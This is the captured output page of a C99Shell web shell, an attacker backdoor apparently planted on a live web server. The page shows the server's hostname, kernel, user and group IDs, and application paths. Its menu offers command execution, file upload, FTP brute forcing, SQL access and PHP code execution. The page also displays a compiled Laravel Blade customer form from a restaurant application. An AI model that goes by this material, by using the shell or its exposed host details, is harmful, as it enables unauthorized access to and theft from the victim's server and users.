!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/multirest.picotech.app/public_html/storage/framework/views/   drwxr-xr-x
Free 28.21 GB of 117.98 GB (23.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     bdf2e539128a24e2206f6800ad12cb0d9e052b17.php (4.59 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php echo csrf_field(); ?>
<div>
    <section>
        <div class="row">
            <div class="col-lg-6 mb-2">
                <div class="form-group">
                    <label class="text-label"><?php echo e(trans('layout.name')); ?>*</label>
                    <input value="<?php echo e(isset($customer)?$customer->name:''); ?>" type="text" name="name"
                           class="form-control" placeholder="Ex: John Doe" required>
                </div>
            </div>

            <div class="col-lg-6 mb-2">
                <div class="form-group">
                    <label class="text-label"><?php echo e(trans('layout.email')); ?></label>
                    <input readonly onfocus="this.removeAttribute('readonly');"
                           value="<?php echo e(isset($customer)?$customer->email:''); ?>" type="email" class="form-control"
                           placeholder="Ex: hello@example.com" name="email">
                </div>
            </div>


            <div class="col-lg-6 mb-2">
                <div class="form-group">
                    <label class="text-label"><?php echo e(trans('layout.password')); ?></label>
                    <input readonly onfocus="this.removeAttribute('readonly');" type="password" class="form-control"
                           placeholder="<?php echo e(trans('layout.password')); ?>"
                           name="password">
                </div>
            </div>

            <?php if(auth()->user()->type=='admin'): ?>
                <div class="col-lg-6">
                    <div class="form-group">
                        <label class="mb-1"><?php echo e(trans('layout.choose_plan')); ?></label>
                        <select name="plan_id" id="plan" class="form-control">
                            <?php $__currentLoopData $plans$__env->addLoop($__currentLoopData); foreach($__currentLoopData as $plan): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
                                <option
                                    <?php echo e(isset($customer) && isset($customer->current_plans[0]) && $customer->current_plans[0]->plan_id==$plan->id?'selected':''); ?> value="<?php echo e($plan->id); ?>"><?php echo e($plan->title); ?>

                                    (<?php echo e(formatNumberWithCurrSymbol($plan->cost)); ?>)
                                </option>
                            <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>

                        </select>
                    </div>
                </div>
            <?php endif; ?>

            <?php if(auth()->user()->type=='restaurant_owner'): ?>
                <div class="col-lg-6">
                    <div class="form-group">
                        <label class="mb-1"><?php echo e(trans('layout.role')); ?></label>
                        <select name="role" class="form-control">

                            <?php $__currentLoopData $roles$__env->addLoop($__currentLoopData); foreach($__currentLoopData as $role): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
                                <option
                                    <?php echo e(isset($customer->role) && $customer->role==$role->name?'selected':''); ?> value="<?php echo e($role->name); ?>"><?php echo e($role->name); ?>

                                </option>
                            <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>

                        </select>
                    </div>
                </div>
                <div class="col-lg-12">
                    <div class="form-group">
                        <label class="mb-1"><?php echo e(trans('layout.restaurant')); ?></label>
                        <select name="restaurant_id" class="form-control">
                            <?php $__currentLoopData $restaurants$__env->addLoop($__currentLoopData); foreach($__currentLoopData as $restaurant): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
                                <option
                                    <?php echo e(isset($customer->restaurant_id) && $customer->restaurant_id==$restaurant->id?'selected':''); ?> value="<?php echo e($restaurant->id); ?>"><?php echo e($restaurant->name); ?></option>
                            <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>
                        </select>
                    </div>
                </div>
            <?php endif; ?>

        </div>
    </section>

</div>

<?php /**PATH /home/picotech/domains/multirest.picotech.app/public_html/resources/views/customer/form.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0062 ]--